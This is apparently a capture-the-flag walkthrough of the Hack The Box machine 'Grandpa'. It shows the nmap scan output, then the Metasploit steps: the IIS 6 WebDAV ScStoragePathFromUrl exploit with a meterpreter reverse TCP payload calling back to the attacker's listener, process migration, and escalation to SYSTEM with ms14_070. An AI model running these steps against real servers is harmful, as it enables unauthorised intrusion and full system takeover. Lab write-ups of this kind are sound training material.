Grandpa is a relatively straightforward box that tests the user’s ability to enumerate with NMAP and Metasploit. Although the initial compromise may differ from Granny, the privlege escalation process is identical.
Step 1: Enumerate with NMAP
As usual, our first step in the investigation is scanning the target with NMAP to check for any exposed ports and services.
➜ grandpa nmap -vv -A 10.129.93.230 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-25 00:02 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:02
Completed Parallel DNS resolution of 1 host. at 00:02, 0.00s elapsed
Initiating Connect Scan at 00:02
Scanning 10.129.93.230 [1000 ports]
Discovered open port 80/tcp on 10.129.93.230
Completed Connect Scan at 00:03, 8.59s elapsed (1000 total ports)
Initiating Service scan at 00:03
Scanning 1 service on 10.129.93.230
Completed Service scan at 00:03, 6.06s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.93.230.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 5.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
Nmap scan report for 10.129.93.230
Host is up, received user-set (0.027s latency).
Scanned at 2023-01-25 00:02:59 EST for 20s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 6.0
| http-ntlm-info:
| Target_Name: GRANPA
| NetBIOS_Domain_Name: GRANPA
| NetBIOS_Computer_Name: GRANPA
| DNS_Domain_Name: granpa
| DNS_Computer_Name: granpa
|_ Product_Version: 5.2.3790
| http-webdav-scan:
| Server Date: Wed, 25 Jan 2023 05:03:14 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Type: Microsoft-IIS/6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:03
Completed NSE at 00:03, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.15 seconds
We can see that port 80 is the only open port. This server is also running a WebDAV application, similar to the previous box we rooted, Granny. Let’s try searching metasploit for potential exploits for this service.
Step 2: Initial Exploit with Metasploit
Let’s search metasploit for relevant exploits:
➜ grandpa msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.2.37-dev- ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the resource command to run
commands from a file
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search webdav
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution
1 exploit/windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
2 exploit/windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
3 auxiliary/scanner/http/webdav_internal_ip normal No HTTP WebDAV Internal IP Scanner
4 auxiliary/scanner/http/webdav_scanner normal No HTTP WebDAV Scanner
5 auxiliary/scanner/http/webdav_website_content normal No HTTP WebDAV Website Content Scanner
6 exploit/windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection
7 exploit/windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
8 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
9 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
10 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
11 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
12 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
13 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation
14 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution
15 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
16 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
17 exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution
18 exploit/windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
19 exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection
20 exploit/windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server
21 exploit/multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve
22 exploit/multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
23 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
24 exploit/windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection
25 exploit/windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection
26 exploit/windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
27 exploit/windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker
28 exploit/windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
29 post/windows/escalate/droplnk normal No Windows Escalate SMB Icon LNK Dropper
30 exploit/windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload
Interact with a module by name or index. For example info 30, use 30 or use exploit/windows/http/xampp_webdav_upload_php
msf6 > use 16
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
We are presented with and try a number of exploits, but we finally make progress with exploit/windows/iis/iis_webdav_scstoragepathfromurl.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.93.230 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.86 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.93.230
[*] Meterpreter session 2 opened (10.10.14.86:4444 -> 10.129.93.230:1039) at 2023-01-25 00:18:51 -0500
We run the exploit after supplying the local port and local host. We are immediately granted a shell.
Step 3: Migrating Processes
We now need to migrate from our current process to a more stable process. This will give us a more stable shell that is less prone to crashing.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
752 392 svchost.exe
796 392 svchost.exe
988 392 spoolsv.exe
1016 392 msdtc.exe
1088 392 cisvc.exe
1136 392 svchost.exe
1192 392 inetinfo.exe
1228 392 svchost.exe
1332 392 VGAuthService.exe
1404 392 vmtoolsd.exe
1508 392 svchost.exe
1612 392 svchost.exe
1792 392 dllhost.exe
1960 392 alg.exe
1988 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2288 584 wmiprvse.exe
2644 344 logon.scr
2724 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2740 3084 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
3084 1508 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
3876 1088 cidaemon.exe
3920 1088 cidaemon.exe
3948 1088 cidaemon.exe
meterpreter > migrate -P 2724
[*] Migrating from 2740 to 2724...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
We were able to successfully migrate to the davcdata.exe process running as the NT AUTHORITY\NETWORK SERVICE. We now need to escalate our privileges.
Step 4: Escalating Privileges
We can use the same exploit that we used to escalate privileges on Granny, as these two servers were released around the same time and are very similar.
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.86 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2003 SP2
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ GRANPA 10.10.14.86:4444 -> 10.129.93.230:1039 (10.129.93.230)
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 2
session => 2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.86:4445
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175686 bytes) to 10.129.93.230
[*] Meterpreter session 3 opened (10.10.14.86:4445 -> 10.129.93.230:1040) at 2023-01-25 00:20:12 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We can see that we now have administrative privileges. The only remaining step is to grab the flags from each user’s desktop and submit.